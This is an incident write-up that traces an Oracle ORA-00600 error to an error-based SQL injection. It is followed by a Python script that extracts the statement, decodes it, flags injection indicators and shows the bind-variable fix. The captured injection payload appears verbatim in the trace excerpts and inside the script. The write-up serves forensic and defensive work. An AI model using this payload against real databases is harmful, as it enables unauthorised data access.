During a routine inspection of a platform in the first quarter of 2016, the following error was found in the Oracle database alert log:
Based on the alert message, the related trc file was checked:
Trace file /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
ORACLE_HOME = /home/orabase/product/db/11203
System name: AIX
Node name: ****
Release: 1
Version: 6
Machine: *********
Instance name: ****
Redo thread mounted by this instance: 1
Oracle process number: 266
Unix process pid: 3408096, image: oracle@****
*** 2016-03-18 00:49:20.826
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.826
*** CLIENT ID:() 2016-03-18 00:49:20.826
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.826
*** MODULE NAME:() 2016-03-18 00:49:20.826
*** ACTION NAME:() 2016-03-18 00:49:20.826
Incident 51281 created, dump file: /home/orabase/diag/rdbms/****/****/incident/incdir_51281/****_ora_3408096_i51281.trc
ORA-00600: 内部错误代码, 参数: [733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
Next, the contents of ****_ora_3408096_i51281.trc were checked:
*** 2016-03-18 00:49:20.842
*** SESSION ID:(1977.61609) 2016-03-18 00:49:20.842
*** CLIENT ID:() 2016-03-18 00:49:20.842
*** SERVICE NAME:(SYS$USERS) 2016-03-18 00:49:20.842
*** MODULE NAME:() 2016-03-18 00:49:20.842
*** ACTION NAME:() 2016-03-18 00:49:20.842
Dump continued from file: /home/orabase/diag/rdbms/****/****/trace/****_ora_3408096.trc
ORA-00600: 内部错误代码, 参数:[733], [558979440], [pga heap], [], [], [], [], [], [], [], [], []
========= Dump for incident 51281 (ORA 600 [733]) ========
*** 2016-03-18 00:49:20.862
dbkedDefDump(): Starting incident default dumps (flags=0x2, level=3, mask=0x0)
----- Current SQL Statement for this session (sql_id=4dgy5ydm4qux1) -----
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
The following SQL statement was found in ****_ora_3408096.trc:
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
This SQL statement is a typical Oracle AND error-based SQL injection attack. The corresponding fix is to validate and filter the parameters that go into the SQL statement, and to run a security scan of the database system and remediate the vulnerabilities found.
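The triage steps implied above (pull the current SQL out of the incident trace, make the CHR()-obfuscated payload readable, recognise the error-based injection pattern, and confirm that string concatenation of the ENTERPRISECODE parameter reproduces the logged statement) can be scripted. The following is an added example, not code from the original post; the trace excerpt embedded in it is reconstructed from the lines quoted above with hostnames masked, the indicator names and the two `build_lookup_*` helpers are assumptions of this example, and the "safe" variant uses Oracle's `:name` bind-variable syntax as the remediation for the parameter-filtering advice given above.

```python
"""Triage helper for an Oracle incident trace: extract the 'Current SQL
Statement', decode CHR()||... chains, score error-based injection
indicators, and show concatenation versus bind variables."""
import re

# Constructed sample: the relevant part of the incident trace quoted above.
SAMPLE_TRACE = """\
========= Dump for incident 51281 (ORA 600 [733]) ========
*** 2016-03-18 00:49:20.862
dbkedDefDump(): Starting incident default dumps (flags=0x2, level=3, mask=0x0)
----- Current SQL Statement for this session (sql_id=4dgy5ydm4qux1) -----
select ENTERPRISEID,STATUS from ENTERPRISE_INFO e where e.ENTERPRISECODE='-8838' OR 4914=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4914=4914) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'eCHY'='eCHY'
"""

SQL_HEADER = re.compile(r"^----- Current SQL Statement for this session \(sql_id=(\w+)\) -----$")


def extract_current_sql(trace_text):
    """Return (sql_id, statement) for the first 'Current SQL Statement' block, or None."""
    lines = trace_text.splitlines()
    for i, line in enumerate(lines):
        m = SQL_HEADER.match(line.strip())
        if not m:
            continue
        stmt = []
        for nxt in lines[i + 1:]:
            # The statement runs until the next trace section marker.
            if nxt.startswith(("-----", "***", "=====")):
                break
            stmt.append(nxt)
        return m.group(1), "\n".join(stmt).strip()
    return None


CHR_CHAIN = re.compile(r"(?:CHR\(\d+\)\|\|)+CHR\(\d+\)", re.IGNORECASE)


def decode_chr_chains(sql):
    """Replace CHR(60)||CHR(58)||... chains with the literal they build, quoted."""
    def repl(m):
        codes = re.findall(r"CHR\((\d+)\)", m.group(0), re.IGNORECASE)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(repl, sql)


# Indicators (names are this example's own) typical of error-based injection
# against Oracle: a closing tautology, OR <n>=(SELECT ...), an XMLType() call
# used to force an error, long CHR() chains, and a CASE WHEN (n=n) oracle.
INDICATORS = [
    ("tautology", re.compile(r"'([^']+)'\s*=\s*'\1'")),
    ("or_number_equals_subquery", re.compile(r"\bOR\s+\d+\s*=\s*\(\s*SELECT\b", re.I)),
    ("xmltype_error_probe", re.compile(r"\bXMLType\s*\(", re.I)),
    ("chr_obfuscation", re.compile(r"(?:CHR\(\d+\)\|\|){3,}", re.I)),
    ("case_when_self_compare", re.compile(r"\(CASE\s+WHEN\s*\(\s*(\d+)\s*=\s*\1\s*\)", re.I)),
]


def score_statement(sql):
    """Return the list of indicator names that match the statement."""
    return [name for name, rx in INDICATORS if rx.search(sql)]


def recover_input(statement):
    """Recover the raw ENTERPRISECODE value the application received,
    assuming it was spliced into the query between single quotes."""
    return statement.split("ENTERPRISECODE='", 1)[1][:-1]


def build_lookup_vulnerable(enterprise_code):
    # The pattern that produced the logged statement: input spliced into SQL text.
    sql = ("select ENTERPRISEID,STATUS from ENTERPRISE_INFO e "
           "where e.ENTERPRISECODE='" + enterprise_code + "'")
    return sql, {}


def build_lookup_safe(enterprise_code):
    # Bind variable: the value travels separately from the SQL text, so it
    # can never change the statement's structure.
    sql = ("select ENTERPRISEID,STATUS from ENTERPRISE_INFO e "
           "where e.ENTERPRISECODE=:code")
    return sql, {"code": enterprise_code}


if __name__ == "__main__":
    sql_id, stmt = extract_current_sql(SAMPLE_TRACE)
    print("sql_id:", sql_id)
    print("indicators:", score_statement(stmt))
    print("decoded:", decode_chr_chains(stmt))
    print("recovered input:", recover_input(stmt))
```

Running it on the embedded excerpt reports all five indicators, shows the CHR() chains decoding to the `<:qpvbq` / `qbvvq>` delimiters that mark where the probe's result is read back from the error text, and confirms that concatenating the recovered input into the lookup query reproduces the logged statement byte for byte, while the bind-variable form keeps the same input as plain data.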